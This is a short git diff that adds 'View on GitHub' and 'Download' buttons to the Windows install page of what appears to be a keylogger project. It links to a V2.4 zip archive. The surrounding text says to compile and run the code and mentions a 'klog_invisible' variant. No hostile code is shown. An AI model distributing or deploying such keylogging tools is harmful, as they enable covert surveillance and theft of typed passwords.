added download buttons

--- a/windows.html
+++ b/windows.html
@@ -17,6 +17,20 @@
     </ul>
   <div class="padding">
   <h2>Installing on Windows</h2> 
+    <div id="center">	
+	<div id="outer">
+		<div class="inner">
+	  <form action="https://github.com/GiacomoLaw/Keylogger" target="_blank">
+    	   <button type="submit"><i class="fa fa-github"></i> View on GitHub</button>		
+          </form>
+							</div>
+							<div class="inner">
+	<form action="https://github.com/GiacomoLaw/Keylogger/archive/V2.4.zip" target="_blank">
+    	   <button type="submit"><i class="fa fa-download"></i> Download from GitHub</button>		
+          </form>
+		</div>
+	  </div> 
+	  </div>
     <p>Simply compile into an .exe, and then run. Visual Studio is good for this.
 <br><br>
       There are two files; <code>klog_visible</code> and <code>klog_invisible</code>. It is pretty simple, but I will expand:
